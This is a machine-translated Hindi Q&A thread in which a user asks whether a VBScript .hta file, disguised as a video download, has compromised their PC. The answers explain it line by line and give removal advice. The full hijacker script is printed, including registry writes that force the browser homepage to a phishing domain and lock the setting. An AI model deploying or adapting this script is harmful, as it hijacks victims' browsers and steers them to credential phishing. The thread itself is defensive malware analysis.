मदद ... वायरस? समझौता हुआ? (Aarama.net)

3

कृपया यह जानने में मदद करें कि मेरा कंप्यूटर समझौता है या नहीं।

मुझे अभी तक यकीन नहीं है कि यह क्या है .. मैं अभी भी कुछ जावास्क्रिप्ट (मेरे स्तर = शुरुआती) फाइलों के माध्यम से ब्राउज़ कर रहा हूं जो मैंने अपने 'शोध' के दौरान पाया ...

कहानी:

  1. विंडोज 7 x 64 प्रोफेशनल, एसेट स्मार्ट सिक्योरिटी 4.2.71.2, नवीनतम फ़ायरफ़ॉक्स, नवीनतम क्रोम, IE 8

  2. मुझे Chrome का डिफ़ॉल्ट डाउनलोड फ़ोल्डर एक फ़ाइल adam-liseli-kizi-otele-goturup-sikiyor.avi.hta मिला है यह एक VB स्क्रिप्ट है:

    Set shell = CreateObject("WScript.Shell")
shell.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\URL\Prefixes\\mirc","http://aarama.net/","REG_SZ"
shell.regwrite "HKLM\Software\Policies\Microsoft\Internet Explorer\Control Panel\\HomePage","00000001","REG_DWORD"
shell.regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\\HomePage","00000001","REG_DWORD"
shell.regwrite "HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "http://aarama.net/","REG_SZ"
shell.regwrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "http://aarama.net/","REG_SZ" 
self.Close

  3. मैंने aarama.net का अनुसरण किया , वहां एक फ़िशिंग वेबसाइट (मुझे लगता है) बहुत सारे जावास्क्रिप्ट के साथ Google की तरह दिख रही है जिसे मैं अभी समझने की कोशिश कर रहा हूं ..

windows-7  security  virus-removal  vbscript 
sdadffdfd
स्रोत

जवाबों:

11

खैर, कुछ नेटवर्क स्तर की खुदाई मैं आपको यह बता सकता हूं:

  1. डोमेन 20 दिन पहले पंजीकृत किया गया था।
  2. रजिस्ट्रार लक्समबर्ग में है लेकिन टेलीफोन नंबर डेनमार्क में है।
  3. साइट तुर्की प्रतीत होती है।
  4. डोमेन मालिक PrivacyProtect के पीछे छिपा हुआ है
  5. साइट सैन फ्रांसिस्को में CloudFlair द्वारा होस्ट किया गया है।

सब सब में यह बहुत ही डरावना लगता है:

  1. यह एक नया डोमेन है
  2. पंजीकरण विवरण नहीं जोड़ते हैं
  3. डोमेन पंजीकृत करने वाले को छिपाना जरूरी नहीं है, लेकिन कोई भी नापाक काम करेगा
  4. CloudFlare बहुत कम जाँच के साथ मुफ्त खाते दे देता है।

जावास्क्रिप्ट पर एक त्वरित नज़र और लिंक्स के भीतर साइट के साथ खेलना बहुत बुरा नहीं था, लेकिन मैंने जेएस का अभी तक ठीक से विश्लेषण नहीं किया है (यह लगभग आधी रात है)। मैं सुबह में अधिक खुदाई करूंगा।

यदि आप पाते हैं कि यह निश्चित रूप से मैलवेयर है, तो CloudFlare को कॉल करने के लिए उन्हें इसे अलर्ट करने के लिए होगा - वे संभवतः साइट को तुरंत बंद कर देंगे।

अपडेट करें

aarama.net जर्मनी में एक होस्टिंग सेटअप में चला गया है जो बॉट और अन्य डोडी साइट्स (your-server.de) की मेजबानी के लिए कुख्यात है।

Majenko
स्रोत
8

मैं ज्यादा स्क्रिप्ट नहीं बोलता, लेकिन इस के इरादे ज्यादातर स्पष्ट हैं।

Set shell = CreateObject("WScript.Shell")

पहली पंक्ति, मुझे पूरा यकीन नहीं है। हालाँकि, कुछ Googling मेरे विचारों की पुष्टि करता है कि यह एक स्क्रिप्ट के लिए एक काफी मानक उद्घाटन रेखा है।

बाकी लाइनें विभिन्न रजिस्ट्री कुंजियों को सेट करती हुई दिखाई देती हैं।

shell.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\URL\Prefixes\\mirc","http://aarama.net/","REG_SZ"

यह इंटरनेट एक्सप्लोरर में एक नया URL उपसर्ग जोड़ता है। अनिवार्य रूप से, किसी भी समय IE को "mirc" में शुरू होने वाले संसाधन का अनुरोध करने के लिए कहा जाता है। और प्रोटोकॉल निर्दिष्ट नहीं है, इसे संसाधित करने से पहले पते के सामने " http://aarama.net/ " डालें । इसलिए, यदि आप अपने एड्रेस बार में "mirc.google.com" टाइप करते हैं, तो IE इसे " http://aarama.net/mirc.google.com " में बदल देगा। यह संभवतः दुर्भावनापूर्ण साइट (या डाउनलोड किए गए मैलवेयर) पर कार्य करने के लिए कुछ अन्य लिपियों में मदद करता है।

shell.regwrite "HKLM\Software\Policies\Microsoft\Internet Explorer\Control Panel\\HomePage","00000001","REG_DWORD"  
shell.regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\\HomePage","00000001","REG_DWORD"

ये रजिस्ट्री कुंजियाँ जोड़ते हैं जो आमतौर पर इंटरनेट एक्सप्लोरर पर समूह नीति नियंत्रण को लागू करती हैं। आप पा सकते हैं कि आप अपने IE होम पेज को कंट्रोल पैनल के माध्यम से अब और नहीं बदल सकते।

shell.regwrite "HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "http://aarama.net/","REG_SZ"  
shell.regwrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "http://aarama.net/","REG_SZ"

ये आपके घर पृष्ठ पर " http://aarama.net/ " सेट करते हैं - यह सुनिश्चित करते हुए कि आप कम से कम एक बार साइट पर जाएंगे, और जो भी फ़िशिंग घोटाला या दुर्भावनापूर्ण कोड हो, उसके शिकार होने का अवसर हो सकता है। बेशक, पहले की चाबियाँ यह सुनिश्चित कर लेंगी कि आप केवल एक बार नहीं जाते क्योंकि आप होम पेज नहीं बदल सकते।

self.Close

फिर, मैं वास्तव में स्क्रिप्ट नहीं बोलता। लेकिन मुझे लगता है कि यह एक स्पष्ट रूप से इसे समाप्त करता है।

इस जानकारी के साथ आपको कुछ चीजें करनी चाहिए:

1.) (बहुत लेट) उस वेबसाइट पर न जाएं।

2.) अपनी मशीन के माध्यम से कुछ अच्छे एंटीवायरस / एंटी-मैलवेयर प्रोग्राम खोदें। मेरी सिफारिशें एक अवास्ट हैं! बूट-टाइम स्कैन, मालवेयरबाइट्स, और स्पाईबोट सर्च और नष्ट। यदि संभव हो, तो स्कैन करने के लिए एक अलग, ज्ञात-अच्छा, डिस्पोजेबल मशीन का उपयोग करें। या, स्कैन के लिए एक अच्छा लाइवसीडी प्राप्त करें।

3.) स्क्रिप्ट द्वारा बनाए गए मूल्यों के लिए अपनी रजिस्ट्री की जांच करें। यदि वे अभी भी वहां हैं, तो अपनी रजिस्ट्री का बैकअप लें, फिर बनाए गए मूल्यों को हटा दें या उन्हें अपनी पसंदीदा सेटिंग्स में बदल दें। पहले तीन को सिर्फ डंप किया जाना चाहिए। अंतिम दो, आपकी पसंद या "के बारे में: रिक्त" पर सेट है।

4.) यदि आप इसके बाद अपने सिस्टम पर किसी भी संदिग्ध गतिविधि को देखते हैं, तो यह "ऑर्बिट फ्रॉम ऑर्बिट" दृष्टिकोण का समय है। आशा है कि आपको अच्छा बैकअप मिला होगा।

Iszi
स्रोत
4

यह कभी बहुत अजीब लगता है। मैं कुछ बातें सुझाता हूँ - मालवेयरबाइट्स सबसे पहले - इसका एक अच्छा स्कैनर, और एक कामचलाऊ रूप से मैलवेयर द्वारा अवरुद्ध - इसका प्रभावी जब यह काम करता है। इसके अलावा, प्रक्रिया प्रबंधक और नेटस्टैट में विषम प्रक्रियाओं की तलाश करें।

मैं यह भी सुझाव देता हूं कि रूटकिट (अपने रूटकिट के मामले में) और हाईजैकथिस का उपयोग करना सीखें और पुष्टि करने के लिए - बाद के लॉग बहुत उपयोगी होते हैं जब यह निर्धारित करने की कोशिश की जाती है कि क्या कोई घुसपैठ, थओ है, वे कुछ इंटरप्टिंग लेते हैं।

जर्नीमैन गीक
स्रोत
0

मैं कोई विशेषज्ञ नहीं हूं, लेकिन ऐसा लगता है कि यह उस डोमेन को इंटरनेट एक्सप्लोरर के लिए होमपेज बना रहा है। डोमेन Google फ़िशर से लिंक करता है।

लक्ष्य आपको अपने Google खाते में साइन इन करना है ताकि वे खातों की कटाई कर सकें। मैंने साइट पर अच्छा नज़र नहीं रखा है, लेकिन मुझे संदेह है कि यह कुछ और भी करता है।

कोई फर्क नहीं पड़ता कि आपको मालवेयरबाइट्स के साथ स्कैन करना चाहिए बस सुनिश्चित करने के लिए।

अ क्लॉकवर्क ऑरेंज
स्रोत
हमारी साइट का प्रयोग करके, आप स्वीकार करते हैं कि आपने हमारी Cookie Policy और निजता नीति को पढ़ और समझा लिया है।
Licensed under cc by-sa 3.0 with attribution required.